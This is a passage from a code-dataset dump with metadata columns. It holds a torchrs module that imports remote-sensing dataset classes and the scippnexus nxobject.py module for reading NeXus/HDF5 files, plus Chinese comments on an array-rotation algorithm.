return ans | zh | 0.15262 | 计算将序列L向右旋转k(0<=k<n-1)后,函数F的最大值 F(k) = 0 * Lk[0] + 1 * Lk[1] + ... + (n - 1) * Lk[n - 1] 时间复杂度:O(n) #分析: #F(0) = 0 * L[0] + 1 * L[1] + ... + (n - 1) * L[n - 1] #F(1) = 0 * L[n - 1] + 1 * L[0] + ... + (n - 1) + L[n - 2] #F(2) = 0 * L[n - 2] + 1 * L[n - 1] + ... + (n - 1) + L[n - 3] #做差: #F(1) - F(0) = L[0] + L[1] + …… + L[n-2] - (n-1) * L[n-1] = sum(L) - L[n-1] * n #F(2) - F(1) = L[0] + L[1] + …… + L[n-3] - (n-1) * L[n-2] + L[n-1] = sum(L) - L[n-2] * n #F(3) - F(2) = sum(L) - L[n-3]*n #F(k) - F(k-1) = sum(L) - L[n-k]*n #过程: #1 计算n #2 计算sum(L) #3 计算F(0) #4 计算F(1)到F(n-1)并统计最大值 #5 输出最大值 | 3.033004 | 3 |
torchrs/datasets/__init__.py | isaaccorley/torchrs | 146 | 6623857 | <filename>torchrs/datasets/__init__.py<gh_stars>100-1000
from . import utils
from .probav import PROBAV
from .etci2021 import ETCI2021
from .rsvqa import RSVQALR, RSVQAHR, RSVQAxBEN
from .eurosat import EuroSATRGB, EuroSATMS
from .resisc45 import RESISC45
from .rsicd import RSICD
from .oscd import OSCD
from .s2looking import S2Looking
from .levircd import LEVIRCDPlus
from .fair1m import FAIR1M
from .sydney_captions import SydneyCaptions
from .ucm_captions import UCMCaptions
from .s2mtcp import S2MTCP
from .advance import ADVANCE
from .sat import SAT4, SAT6
from .hrscd import HRSCD
from .inria_ail import InriaAIL
from .tiselac import Tiselac
from .gid15 import GID15
from .zuericrop import ZueriCrop
from .aid import AID
from .dubai_segmentation import DubaiSegmentation
from .hkh_glacier import HKHGlacierMapping
from .ucm import UCM
from .patternnet import PatternNet
from .whu_rs19 import WHURS19
from .rsscn7 import RSSCN7
from .brazilian_coffee import BrazilianCoffeeScenes
__all__ = [
"PROBAV", "ETCI2021", "RSVQALR", "RSVQAxBEN", "EuroSATRGB", "EuroSATMS",
"RESISC45", "RSICD", "OSCD", "S2Looking", "LEVIRCDPlus", "FAIR1M",
"SydneyCaptions", "UCMCaptions", "S2MTCP", "ADVANCE", "SAT4", "SAT6",
"HRSCD", "InriaAIL", "Tiselac", "GID15", "ZueriCrop", "AID", "DubaiSegmentation",
"HKHGlacierMapping", "UCM", "PatternNet", "RSVQAHR", "WHURS19", "RSSCN7",
"BrazilianCoffeeScenes"
]
| <filename>torchrs/datasets/__init__.py<gh_stars>100-1000
from . import utils
from .probav import PROBAV
from .etci2021 import ETCI2021
from .rsvqa import RSVQALR, RSVQAHR, RSVQAxBEN
from .eurosat import EuroSATRGB, EuroSATMS
from .resisc45 import RESISC45
from .rsicd import RSICD
from .oscd import OSCD
from .s2looking import S2Looking
from .levircd import LEVIRCDPlus
from .fair1m import FAIR1M
from .sydney_captions import SydneyCaptions
from .ucm_captions import UCMCaptions
from .s2mtcp import S2MTCP
from .advance import ADVANCE
from .sat import SAT4, SAT6
from .hrscd import HRSCD
from .inria_ail import InriaAIL
from .tiselac import Tiselac
from .gid15 import GID15
from .zuericrop import ZueriCrop
from .aid import AID
from .dubai_segmentation import DubaiSegmentation
from .hkh_glacier import HKHGlacierMapping
from .ucm import UCM
from .patternnet import PatternNet
from .whu_rs19 import WHURS19
from .rsscn7 import RSSCN7
from .brazilian_coffee import BrazilianCoffeeScenes
__all__ = [
"PROBAV", "ETCI2021", "RSVQALR", "RSVQAxBEN", "EuroSATRGB", "EuroSATMS",
"RESISC45", "RSICD", "OSCD", "S2Looking", "LEVIRCDPlus", "FAIR1M",
"SydneyCaptions", "UCMCaptions", "S2MTCP", "ADVANCE", "SAT4", "SAT6",
"HRSCD", "InriaAIL", "Tiselac", "GID15", "ZueriCrop", "AID", "DubaiSegmentation",
"HKHGlacierMapping", "UCM", "PatternNet", "RSVQAHR", "WHURS19", "RSSCN7",
"BrazilianCoffeeScenes"
]
| none | 1 | 1.243535 | 1 | |
src/scippnexus/nxobject.py | scipp/scippnexus | 0 | 6623858 | # SPDX-License-Identifier: BSD-3-Clause
# Copyright (c) 2022 Scipp contributors (https://github.com/scipp)
# @author <NAME>
from __future__ import annotations
import re
import warnings
import datetime
import dateutil.parser
from enum import Enum, auto
import functools
from typing import List, Union, Any, Dict, Tuple, Protocol
import numpy as np
import scipp as sc
import h5py
from ._hdf5_nexus import _cset_to_encoding, _ensure_str
from ._hdf5_nexus import _ensure_supported_int_type, _warn_latin1_decode
from .typing import H5Group, H5Dataset, ScippIndex
from ._common import to_plain_index
from ._common import convert_time_to_datetime64
NXobjectIndex = Union[str, ScippIndex]
# TODO move into scipp
class DimensionedArray(Protocol):
"""
A multi-dimensional array with a unit and dimension labels.
Could be, e.g., a scipp.Variable or a dimple dataclass wrapping a numpy array.
"""
@property
def values(self):
"""Multi-dimensional array of values"""
@property
def unit(self):
"""Physical unit of the values"""
@property
def dims(self) -> List[str]:
"""Dimension labels for the values"""
class AttributeManager(Protocol):
def __getitem__(self, name: str):
"""Get attribute"""
class NexusStructureError(Exception):
"""Invalid or unsupported class and field structure in Nexus.
"""
pass
class NX_class(Enum):
NXdata = auto()
NXdetector = auto()
NXdisk_chopper = auto()
NXentry = auto()
NXevent_data = auto()
NXinstrument = auto()
NXlog = auto()
NXmonitor = auto()
NXroot = auto()
NXsample = auto()
NXsource = auto()
NXtransformations = auto()
class Attrs:
"""HDF5 attributes.
"""
def __init__(self, attrs: AttributeManager):
self._attrs = attrs
def __contains__(self, name: str) -> bool:
return name in self._attrs
def __getitem__(self, name: str) -> Any:
attr = self._attrs[name]
# Is this check for string attributes sufficient? Is there a better way?
if isinstance(attr, (str, bytes)):
cset = self._attrs.get_id(name.encode("utf-8")).get_type().get_cset()
return _ensure_str(attr, _cset_to_encoding(cset))
return attr
def __setitem__(self, name: str, val: Any):
self._attrs[name] = val
def __iter__(self):
yield from self._attrs
def get(self, name: str, default=None) -> Any:
return self[name] if name in self else default
def keys(self):
return self._attrs.keys()
def _is_time(obj):
dummy = sc.empty(dims=[], shape=[], unit=obj.unit)
try:
dummy.to(unit='s')
return True
except sc.UnitError:
return False
def _as_datetime(obj: Any):
if isinstance(obj, str):
try:
# NumPy and scipp cannot handle timezone information. We therefore apply it,
# i.e., convert to UTC.
# Would like to use dateutil directly, but with Python's datetime we do not
# get nanosecond precision. Therefore we combine numpy and dateutil parsing.
date_only = 'T' not in obj
if date_only:
return sc.datetime(obj)
date, time = obj.split('T')
time_and_timezone_offset = re.split(r'Z|\+|-', time)
time = time_and_timezone_offset[0]
if len(time_and_timezone_offset) == 1:
# No timezone, parse directly (scipp based on numpy)
return sc.datetime(f'{date}T{time}')
else:
# There is timezone info. Parse with dateutil.
dt = dateutil.parser.isoparse(obj)
dt = dt.replace(microsecond=0) # handled by numpy
dt = dt.astimezone(datetime.timezone.utc)
dt = dt.replace(tzinfo=None).isoformat()
# We operate with string operations here and thus end up parsing date
# and time twice. The reason is that the timezone-offset arithmetic
# cannot be done, e.g., in nanoseconds without causing rounding errors.
if '.' in time:
dt += f".{time.split('.')[1]}"
return sc.datetime(dt)
except ValueError:
pass
return None
class Field:
"""NeXus field.
In HDF5 fields are represented as dataset.
"""
def __init__(self, dataset: H5Dataset, dims=None, is_time=None):
self._dataset = dataset
self._shape = list(self._dataset.shape)
self._is_time = is_time
# NeXus treats [] and [1] interchangeably. In general this is ill-defined, but
# the best we can do appears to be squeezing unless the file provides names for
# dimensions. The shape property of this class does thus not necessarily return
# the same as the shape of the underlying dataset.
if dims is not None:
self._dims = dims
if len(self._dims) < len(self._shape):
# The convention here is that the given dimensions apply to the shapes
# starting from the left. So we only squeeze dimensions that are after
# len(dims).
self._shape = self._shape[:len(self._dims)] + [
size for size in self._shape[len(self._dims):] if size != 1
]
elif (axes := self.attrs.get('axes')) is not None:
self._dims = axes.split(',')
else:
self._shape = [size for size in self._shape if size != 1]
self._dims = [f'dim_{i}' for i in range(self.ndim)]
def __getitem__(self, select) -> sc.Variable:
index = to_plain_index(self.dims, select)
if isinstance(index, (int, slice)):
index = (index, )
base_dims = self.dims
base_shape = self.shape
dims = []
shape = []
for i, ind in enumerate(index):
if not isinstance(ind, int):
dims.append(base_dims[i])
shape.append(len(range(*ind.indices(base_shape[i]))))
variable = sc.empty(dims=dims, shape=shape, dtype=self.dtype, unit=self.unit)
# If the variable is empty, return early
if np.prod(shape) == 0:
return variable
if self.dtype == sc.DType.string:
try:
strings = self._dataset.asstr()[index]
except UnicodeDecodeError as e:
strings = self._dataset.asstr(encoding='latin-1')[index]
_warn_latin1_decode(self._dataset, strings, str(e))
variable.values = np.asarray(strings).flatten()
elif variable.values.flags["C_CONTIGUOUS"]:
# On versions of h5py prior to 3.2, a TypeError occurs in some cases
# where h5py cannot broadcast data with e.g. shape (20, 1) to a buffer
# of shape (20,). Note that broadcasting (1, 20) -> (20,) does work
# (see https://github.com/h5py/h5py/pull/1796).
# Therefore, we manually squeeze here.
# A pin of h5py<3.2 is currently required by Mantid and hence scippneutron
# (see https://github.com/h5py/h5py/issues/1880#issuecomment-823223154)
# hence this workaround. Once we can use a more recent h5py with Mantid,
# this try/except can be removed.
try:
self._dataset.read_direct(variable.values, source_sel=index)
except TypeError:
variable.values = self._dataset[index].squeeze()
else:
variable.values = self._dataset[index]
if _is_time(variable):
starts = []
for name in self.attrs:
if (dt := _as_datetime(self.attrs[name])) is not None:
starts.append(dt)
if self._is_time and len(starts) == 0:
starts.append(sc.epoch(unit=self.unit))
if len(starts) == 1:
variable = convert_time_to_datetime64(
variable,
start=starts[0],
scaling_factor=self.attrs.get('scaling_factor'))
return variable
def __repr__(self) -> str:
return f'<Nexus field "{self._dataset.name}">'
@property
def attrs(self) -> Attrs:
return Attrs(self._dataset.attrs)
@property
def dtype(self) -> str:
dtype = self._dataset.dtype
if str(dtype).startswith('str') or h5py.check_string_dtype(dtype):
dtype = sc.DType.string
else:
dtype = sc.DType(_ensure_supported_int_type(str(dtype)))
return dtype
@property
def name(self) -> str:
return self._dataset.name
@property
def file(self) -> NXroot:
return NXroot(self._dataset.file)
@property
def parent(self) -> NXobject:
return _make(self._dataset.parent)
@property
def ndim(self) -> int:
"""Total number of dimensions in the dataset.
See the shape property for potential differences to the value returned by the
underlying h5py.Dataset.ndim.
"""
return len(self.shape)
@property
def shape(self) -> List[int]:
"""Shape of the field.
NeXus may use extra dimensions of length one to store data, such as shape=[1]
instead of shape=[]. This property returns the *squeezed* shape, dropping all
length-1 dimensions that are not explicitly named. The returned shape may thus
be different from the shape of the underlying h5py.Dataset.
"""
return self._shape
@property
def dims(self) -> List[str]:
return self._dims
@property
def unit(self) -> Union[sc.Unit, None]:
if (unit := self.attrs.get('units')) is not None:
try:
return sc.Unit(unit)
except sc.UnitError:
warnings.warn(f"Unrecognized unit '{unit}' for value dataset "
f"in '{self.name}'; setting unit as 'dimensionless'")
return sc.units.one
return None
class NXobject:
"""Base class for all NeXus groups.
"""
def __init__(self, group: H5Group):
self._group = group
self.child_params = {}
def _get_child(
self,
name: NXobjectIndex,
use_field_dims: bool = False) -> Union['NXobject', Field, sc.DataArray]:
"""Get item, with flag to control whether fields dims should be inferred"""
if name is None:
raise KeyError("None is not a valid index")
if isinstance(name, str):
item = self._group[name]
if hasattr(item, 'shape'):
dims = self._get_field_dims(name) if use_field_dims else None
return Field(item, dims=dims, **self.child_params.get(name, {}))
else:
return _make(item)
da = self._getitem(name)
if (t := self.depends_on) is not None:
da.coords['depends_on'] = t if isinstance(t, sc.Variable) else sc.scalar(t)
return da
def __getitem__(
self,
name: NXobjectIndex) -> Union['NXobject', Field, sc.DataArray, sc.Dataset]:
return self._get_child(name, use_field_dims=True)
def _getitem(self, index: ScippIndex) -> Union[sc.DataArray, sc.Dataset]:
raise NotImplementedError(f'Loading {self.nx_class} is not supported.')
def _get_field_dims(self, name: str) -> Union[None, List[str]]:
"""Subclasses should reimplement this to provide dimension labels for fields."""
return None
def __contains__(self, name: str) -> bool:
return name in self._group
def get(self, name: str, default=None) -> Union['NXobject', Field, sc.DataArray]:
return self[name] if name in self else default
@property
def attrs(self) -> Attrs:
return Attrs(self._group.attrs)
@property
def name(self) -> str:
return self._group.name
@property
def file(self) -> NXroot:
return NXroot(self._group.file)
@property
def parent(self) -> NXobject:
return _make(self._group.parent)
def _ipython_key_completions_(self) -> List[str]:
return list(self.keys())
def keys(self) -> List[str]:
return self._group.keys()
def values(self) -> List[Union[Field, 'NXobject']]:
return [self[name] for name in self.keys()]
def items(self) -> List[Tuple[str, Union[Field, 'NXobject']]]:
return list(zip(self.keys(), self.values()))
@functools.lru_cache()
def by_nx_class(self) -> Dict[NX_class, Dict[str, 'NXobject']]:
classes = {name: [] for name in _nx_class_registry()}
# TODO implement visititems for NXobject and merge the two blocks
def _match_nx_class(_, node):
if not hasattr(node, 'shape'):
if (nx_class := node.attrs.get('NX_class')) is not None:
if not isinstance(nx_class, str):
nx_class = nx_class.decode('UTF-8')
if nx_class in _nx_class_registry():
classes[nx_class].append(node)
self._group.visititems(_match_nx_class)
out = {}
for nx_class, groups in classes.items():
names = [group.name.split('/')[-1] for group in groups]
if len(names) != len(set(names)): # fall back to full path if duplicate
names = [group.name for group in groups]
out[NX_class[nx_class]] = {n: _make(g) for n, g in zip(names, groups)}
return out
@property
def nx_class(self) -> NX_class:
"""The value of the NX_class attribute of the group.
In case of the subclass NXroot this returns 'NXroot' even if the attribute
is not actually set. This is to support the majority of all legacy files, which
do not have this attribute.
"""
return NX_class[self.attrs['NX_class']]
@property
def depends_on(self) -> Union[sc.Variable, sc.DataArray, None]:
if (depends_on := self.get('depends_on')) is not None:
# Imported late to avoid cyclic import
from .nxtransformations import get_full_transformation
return get_full_transformation(depends_on)
return None
def __repr__(self) -> str:
return f'<{type(self).__name__} "{self._group.name}">'
def create_field(self, name: str, data: DimensionedArray, **kwargs) -> Field:
values = data.values
if data.dtype == sc.DType.string:
values = np.array(data.values, dtype=object)
elif data.dtype == sc.DType.datetime64:
start = sc.epoch(unit=data.unit)
values = (data - start).values
dataset = self._group.create_dataset(name, data=values, **kwargs)
if data.unit is not None:
dataset.attrs['units'] = str(data.unit)
if data.dtype == sc.DType.datetime64:
dataset.attrs['start'] = str(start.value)
return Field(dataset, data.dims)
def create_class(self, name: str, nx_class: NX_class) -> NXobject:
group = self._group.create_group(name)
group.attrs['NX_class'] = nx_class.name
return _make(group)
def __setitem__(self, name: str, value: Union[Field, NXobject, DimensionedArray]):
"""Create a link or a new field."""
if isinstance(value, Field):
self._group[name] = value._dataset
elif isinstance(value, NXobject):
self._group[name] = value._group
else:
self.create_field(name, value)
class NXroot(NXobject):
"""Root of a NeXus file."""
@property
def nx_class(self) -> NX_class:
# As an oversight in the NeXus standard and the reference implementation,
# the NX_class was never set to NXroot. This applies to essentially all
# files in existence before 2016, and files written by other implementations
# that were inspired by the reference implementation. We thus hardcode NXroot:
return NX_class['NXroot']
class NXentry(NXobject):
"""Entry in a NeXus file."""
class NXinstrument(NXobject):
"""Group of instrument-related information."""
class NXtransformations(NXobject):
"""Group of transformations."""
def _make(group) -> NXobject:
if (nx_class := Attrs(group.attrs).get('NX_class')) is not None:
return _nx_class_registry().get(nx_class, NXobject)(group)
return group # Return underlying (h5py) group
@functools.lru_cache()
def _nx_class_registry():
from .nxevent_data import NXevent_data
from .nxdata import NXdata
from .nxdetector import NXdetector
from .nxdisk_chopper import NXdisk_chopper
from .nxlog import NXlog
from .nxmonitor import NXmonitor
from .nxsample import NXsample
from .nxsource import NXsource
return {
cls.__name__: cls
for cls in [
NXroot, NXentry, NXevent_data, NXlog, NXmonitor, NXdata, NXdetector,
NXsample, NXsource, NXdisk_chopper, NXinstrument, NXtransformations
]
}
| # SPDX-License-Identifier: BSD-3-Clause
# Copyright (c) 2022 Scipp contributors (https://github.com/scipp)
# @author <NAME>
from __future__ import annotations
import re
import warnings
import datetime
import dateutil.parser
from enum import Enum, auto
import functools
from typing import List, Union, Any, Dict, Tuple, Protocol
import numpy as np
import scipp as sc
import h5py
from ._hdf5_nexus import _cset_to_encoding, _ensure_str
from ._hdf5_nexus import _ensure_supported_int_type, _warn_latin1_decode
from .typing import H5Group, H5Dataset, ScippIndex
from ._common import to_plain_index
from ._common import convert_time_to_datetime64
NXobjectIndex = Union[str, ScippIndex]
# TODO move into scipp
class DimensionedArray(Protocol):
"""
A multi-dimensional array with a unit and dimension labels.
Could be, e.g., a scipp.Variable or a dimple dataclass wrapping a numpy array.
"""
@property
def values(self):
"""Multi-dimensional array of values"""
@property
def unit(self):
"""Physical unit of the values"""
@property
def dims(self) -> List[str]:
"""Dimension labels for the values"""
class AttributeManager(Protocol):
def __getitem__(self, name: str):
"""Get attribute"""
class NexusStructureError(Exception):
"""Invalid or unsupported class and field structure in Nexus.
"""
pass
class NX_class(Enum):
NXdata = auto()
NXdetector = auto()
NXdisk_chopper = auto()
NXentry = auto()
NXevent_data = auto()
NXinstrument = auto()
NXlog = auto()
NXmonitor = auto()
NXroot = auto()
NXsample = auto()
NXsource = auto()
NXtransformations = auto()
class Attrs:
"""HDF5 attributes.
"""
def __init__(self, attrs: AttributeManager):
self._attrs = attrs
def __contains__(self, name: str) -> bool:
return name in self._attrs
def __getitem__(self, name: str) -> Any:
attr = self._attrs[name]
# Is this check for string attributes sufficient? Is there a better way?
if isinstance(attr, (str, bytes)):
cset = self._attrs.get_id(name.encode("utf-8")).get_type().get_cset()
return _ensure_str(attr, _cset_to_encoding(cset))
return attr
def __setitem__(self, name: str, val: Any):
self._attrs[name] = val
def __iter__(self):
yield from self._attrs
def get(self, name: str, default=None) -> Any:
return self[name] if name in self else default
def keys(self):
return self._attrs.keys()
def _is_time(obj):
dummy = sc.empty(dims=[], shape=[], unit=obj.unit)
try:
dummy.to(unit='s')
return True
except sc.UnitError:
return False
def _as_datetime(obj: Any):
if isinstance(obj, str):
try:
# NumPy and scipp cannot handle timezone information. We therefore apply it,
# i.e., convert to UTC.
# Would like to use dateutil directly, but with Python's datetime we do not
# get nanosecond precision. Therefore we combine numpy and dateutil parsing.
date_only = 'T' not in obj
if date_only:
return sc.datetime(obj)
date, time = obj.split('T')
time_and_timezone_offset = re.split(r'Z|\+|-', time)
time = time_and_timezone_offset[0]
if len(time_and_timezone_offset) == 1:
# No timezone, parse directly (scipp based on numpy)
return sc.datetime(f'{date}T{time}')
else:
# There is timezone info. Parse with dateutil.
dt = dateutil.parser.isoparse(obj)
dt = dt.replace(microsecond=0) # handled by numpy
dt = dt.astimezone(datetime.timezone.utc)
dt = dt.replace(tzinfo=None).isoformat()
# We operate with string operations here and thus end up parsing date
# and time twice. The reason is that the timezone-offset arithmetic
# cannot be done, e.g., in nanoseconds without causing rounding errors.
if '.' in time:
dt += f".{time.split('.')[1]}"
return sc.datetime(dt)
except ValueError:
pass
return None
class Field:
"""NeXus field.
In HDF5 fields are represented as dataset.
"""
def __init__(self, dataset: H5Dataset, dims=None, is_time=None):
self._dataset = dataset
self._shape = list(self._dataset.shape)
self._is_time = is_time
# NeXus treats [] and [1] interchangeably. In general this is ill-defined, but
# the best we can do appears to be squeezing unless the file provides names for
# dimensions. The shape property of this class does thus not necessarily return
# the same as the shape of the underlying dataset.
if dims is not None:
self._dims = dims
if len(self._dims) < len(self._shape):
# The convention here is that the given dimensions apply to the shapes
# starting from the left. So we only squeeze dimensions that are after
# len(dims).
self._shape = self._shape[:len(self._dims)] + [
size for size in self._shape[len(self._dims):] if size != 1
]
elif (axes := self.attrs.get('axes')) is not None:
self._dims = axes.split(',')
else:
self._shape = [size for size in self._shape if size != 1]
self._dims = [f'dim_{i}' for i in range(self.ndim)]
def __getitem__(self, select) -> sc.Variable:
index = to_plain_index(self.dims, select)
if isinstance(index, (int, slice)):
index = (index, )
base_dims = self.dims
base_shape = self.shape
dims = []
shape = []
for i, ind in enumerate(index):
if not isinstance(ind, int):
dims.append(base_dims[i])
shape.append(len(range(*ind.indices(base_shape[i]))))
variable = sc.empty(dims=dims, shape=shape, dtype=self.dtype, unit=self.unit)
# If the variable is empty, return early
if np.prod(shape) == 0:
return variable
if self.dtype == sc.DType.string:
try:
strings = self._dataset.asstr()[index]
except UnicodeDecodeError as e:
strings = self._dataset.asstr(encoding='latin-1')[index]
_warn_latin1_decode(self._dataset, strings, str(e))
variable.values = np.asarray(strings).flatten()
elif variable.values.flags["C_CONTIGUOUS"]:
# On versions of h5py prior to 3.2, a TypeError occurs in some cases
# where h5py cannot broadcast data with e.g. shape (20, 1) to a buffer
# of shape (20,). Note that broadcasting (1, 20) -> (20,) does work
# (see https://github.com/h5py/h5py/pull/1796).
# Therefore, we manually squeeze here.
# A pin of h5py<3.2 is currently required by Mantid and hence scippneutron
# (see https://github.com/h5py/h5py/issues/1880#issuecomment-823223154)
# hence this workaround. Once we can use a more recent h5py with Mantid,
# this try/except can be removed.
try:
self._dataset.read_direct(variable.values, source_sel=index)
except TypeError:
variable.values = self._dataset[index].squeeze()
else:
variable.values = self._dataset[index]
if _is_time(variable):
starts = []
for name in self.attrs:
if (dt := _as_datetime(self.attrs[name])) is not None:
starts.append(dt)
if self._is_time and len(starts) == 0:
starts.append(sc.epoch(unit=self.unit))
if len(starts) == 1:
variable = convert_time_to_datetime64(
variable,
start=starts[0],
scaling_factor=self.attrs.get('scaling_factor'))
return variable
def __repr__(self) -> str:
return f'<Nexus field "{self._dataset.name}">'
@property
def attrs(self) -> Attrs:
return Attrs(self._dataset.attrs)
@property
def dtype(self) -> str:
dtype = self._dataset.dtype
if str(dtype).startswith('str') or h5py.check_string_dtype(dtype):
dtype = sc.DType.string
else:
dtype = sc.DType(_ensure_supported_int_type(str(dtype)))
return dtype
@property
def name(self) -> str:
return self._dataset.name
@property
def file(self) -> NXroot:
return NXroot(self._dataset.file)
@property
def parent(self) -> NXobject:
return _make(self._dataset.parent)
@property
def ndim(self) -> int:
"""Total number of dimensions in the dataset.
See the shape property for potential differences to the value returned by the
underlying h5py.Dataset.ndim.
"""
return len(self.shape)
@property
def shape(self) -> List[int]:
"""Shape of the field.
NeXus may use extra dimensions of length one to store data, such as shape=[1]
instead of shape=[]. This property returns the *squeezed* shape, dropping all
length-1 dimensions that are not explicitly named. The returned shape may thus
be different from the shape of the underlying h5py.Dataset.
"""
return self._shape
@property
def dims(self) -> List[str]:
return self._dims
@property
def unit(self) -> Union[sc.Unit, None]:
if (unit := self.attrs.get('units')) is not None:
try:
return sc.Unit(unit)
except sc.UnitError:
warnings.warn(f"Unrecognized unit '{unit}' for value dataset "
f"in '{self.name}'; setting unit as 'dimensionless'")
return sc.units.one
return None
class NXobject:
"""Base class for all NeXus groups.
"""
def __init__(self, group: H5Group):
self._group = group
self.child_params = {}
def _get_child(
self,
name: NXobjectIndex,
use_field_dims: bool = False) -> Union['NXobject', Field, sc.DataArray]:
"""Get item, with flag to control whether fields dims should be inferred"""
if name is None:
raise KeyError("None is not a valid index")
if isinstance(name, str):
item = self._group[name]
if hasattr(item, 'shape'):
dims = self._get_field_dims(name) if use_field_dims else None
return Field(item, dims=dims, **self.child_params.get(name, {}))
else:
return _make(item)
da = self._getitem(name)
if (t := self.depends_on) is not None:
da.coords['depends_on'] = t if isinstance(t, sc.Variable) else sc.scalar(t)
return da
def __getitem__(
self,
name: NXobjectIndex) -> Union['NXobject', Field, sc.DataArray, sc.Dataset]:
return self._get_child(name, use_field_dims=True)
def _getitem(self, index: ScippIndex) -> Union[sc.DataArray, sc.Dataset]:
raise NotImplementedError(f'Loading {self.nx_class} is not supported.')
def _get_field_dims(self, name: str) -> Union[None, List[str]]:
"""Subclasses should reimplement this to provide dimension labels for fields."""
return None
def __contains__(self, name: str) -> bool:
return name in self._group
def get(self, name: str, default=None) -> Union['NXobject', Field, sc.DataArray]:
return self[name] if name in self else default
@property
def attrs(self) -> Attrs:
return Attrs(self._group.attrs)
@property
def name(self) -> str:
return self._group.name
@property
def file(self) -> NXroot:
return NXroot(self._group.file)
@property
def parent(self) -> NXobject:
return _make(self._group.parent)
def _ipython_key_completions_(self) -> List[str]:
return list(self.keys())
def keys(self) -> List[str]:
return self._group.keys()
def values(self) -> List[Union[Field, 'NXobject']]:
return [self[name] for name in self.keys()]
def items(self) -> List[Tuple[str, Union[Field, 'NXobject']]]:
return list(zip(self.keys(), self.values()))
@functools.lru_cache()
def by_nx_class(self) -> Dict[NX_class, Dict[str, 'NXobject']]:
classes = {name: [] for name in _nx_class_registry()}
# TODO implement visititems for NXobject and merge the two blocks
def _match_nx_class(_, node):
if not hasattr(node, 'shape'):
if (nx_class := node.attrs.get('NX_class')) is not None:
if not isinstance(nx_class, str):
nx_class = nx_class.decode('UTF-8')
if nx_class in _nx_class_registry():
classes[nx_class].append(node)
self._group.visititems(_match_nx_class)
out = {}
for nx_class, groups in classes.items():
names = [group.name.split('/')[-1] for group in groups]
if len(names) != len(set(names)): # fall back to full path if duplicate
names = [group.name for group in groups]
out[NX_class[nx_class]] = {n: _make(g) for n, g in zip(names, groups)}
return out
@property
def nx_class(self) -> NX_class:
"""The value of the NX_class attribute of the group.
In case of the subclass NXroot this returns 'NXroot' even if the attribute
is not actually set. This is to support the majority of all legacy files, which
do not have this attribute.
"""
return NX_class[self.attrs['NX_class']]
@property
def depends_on(self) -> Union[sc.Variable, sc.DataArray, None]:
if (depends_on := self.get('depends_on')) is not None:
# Imported late to avoid cyclic import
from .nxtransformations import get_full_transformation
return get_full_transformation(depends_on)
return None
def __repr__(self) -> str:
return f'<{type(self).__name__} "{self._group.name}">'
def create_field(self, name: str, data: DimensionedArray, **kwargs) -> Field:
values = data.values
if data.dtype == sc.DType.string:
values = np.array(data.values, dtype=object)
elif data.dtype == sc.DType.datetime64:
start = sc.epoch(unit=data.unit)
values = (data - start).values
dataset = self._group.create_dataset(name, data=values, **kwargs)
if data.unit is not None:
dataset.attrs['units'] = str(data.unit)
if data.dtype == sc.DType.datetime64:
dataset.attrs['start'] = str(start.value)
return Field(dataset, data.dims)
def create_class(self, name: str, nx_class: NX_class) -> NXobject:
group = self._group.create_group(name)
group.attrs['NX_class'] = nx_class.name
return _make(group)
def __setitem__(self, name: str, value: Union[Field, NXobject, DimensionedArray]):
"""Create a link or a new field."""
if isinstance(value, Field):
self._group[name] = value._dataset
elif isinstance(value, NXobject):
self._group[name] = value._group
else:
self.create_field(name, value)
class NXroot(NXobject):
"""Root of a NeXus file."""
@property
def nx_class(self) -> NX_class:
# As an oversight in the NeXus standard and the reference implementation,
# the NX_class was never set to NXroot. This applies to essentially all
# files in existence before 2016, and files written by other implementations
# that were inspired by the reference implementation. We thus hardcode NXroot:
return NX_class['NXroot']
class NXentry(NXobject):
"""Entry in a NeXus file."""
class NXinstrument(NXobject):
"""Group of instrument-related information."""
class NXtransformations(NXobject):
"""Group of transformations."""
def _make(group) -> NXobject:
if (nx_class := Attrs(group.attrs).get('NX_class')) is not None:
return _nx_class_registry().get(nx_class, NXobject)(group)
return group # Return underlying (h5py) group
@functools.lru_cache()
def _nx_class_registry():
from .nxevent_data import NXevent_data
from .nxdata import NXdata
from .nxdetector import NXdetector
from .nxdisk_chopper import NXdisk_chopper
from .nxlog import NXlog
from .nxmonitor import NXmonitor
from .nxsample import NXsample
from .nxsource import NXsource
return {
cls.__name__: cls
for cls in [
NXroot, NXentry, NXevent_data, NXlog, NXmonitor, NXdata, NXdetector,
NXsample, NXsource, NXdisk_chopper, NXinstrument, NXtransformations
]
}
| en | 0.846349 | # SPDX-License-Identifier: BSD-3-Clause # Copyright (c) 2022 Scipp contributors (https://github.com/scipp) # @author <NAME> # TODO move into scipp A multi-dimensional array with a unit and dimension labels. Could be, e.g., a scipp.Variable or a dimple dataclass wrapping a numpy array. Multi-dimensional array of values Physical unit of the values Dimension labels for the values Get attribute Invalid or unsupported class and field structure in Nexus. HDF5 attributes. # Is this check for string attributes sufficient? Is there a better way? # NumPy and scipp cannot handle timezone information. We therefore apply it, # i.e., convert to UTC. # Would like to use dateutil directly, but with Python's datetime we do not # get nanosecond precision. Therefore we combine numpy and dateutil parsing. # No timezone, parse directly (scipp based on numpy) # There is timezone info. Parse with dateutil. # handled by numpy # We operate with string operations here and thus end up parsing date # and time twice. The reason is that the timezone-offset arithmetic # cannot be done, e.g., in nanoseconds without causing rounding errors. NeXus field. In HDF5 fields are represented as dataset. # NeXus treats [] and [1] interchangeably. In general this is ill-defined, but # the best we can do appears to be squeezing unless the file provides names for # dimensions. The shape property of this class does thus not necessarily return # the same as the shape of the underlying dataset. # The convention here is that the given dimensions apply to the shapes # starting from the left. So we only squeeze dimensions that are after # len(dims). # If the variable is empty, return early # On versions of h5py prior to 3.2, a TypeError occurs in some cases # where h5py cannot broadcast data with e.g. shape (20, 1) to a buffer # of shape (20,). Note that broadcasting (1, 20) -> (20,) does work # (see https://github.com/h5py/h5py/pull/1796). # Therefore, we manually squeeze here. # A pin of h5py<3.2 is currently required by Mantid and hence scippneutron # (see https://github.com/h5py/h5py/issues/1880#issuecomment-823223154) # hence this workaround. Once we can use a more recent h5py with Mantid, # this try/except can be removed. Total number of dimensions in the dataset. See the shape property for potential differences to the value returned by the underlying h5py.Dataset.ndim. Shape of the field. NeXus may use extra dimensions of length one to store data, such as shape=[1] instead of shape=[]. This property returns the *squeezed* shape, dropping all length-1 dimensions that are not explicitly named. The returned shape may thus be different from the shape of the underlying h5py.Dataset. Base class for all NeXus groups. Get item, with flag to control whether fields dims should be inferred Subclasses should reimplement this to provide dimension labels for fields. # TODO implement visititems for NXobject and merge the two blocks # fall back to full path if duplicate The value of the NX_class attribute of the group. In case of the subclass NXroot this returns 'NXroot' even if the attribute is not actually set. This is to support the majority of all legacy files, which do not 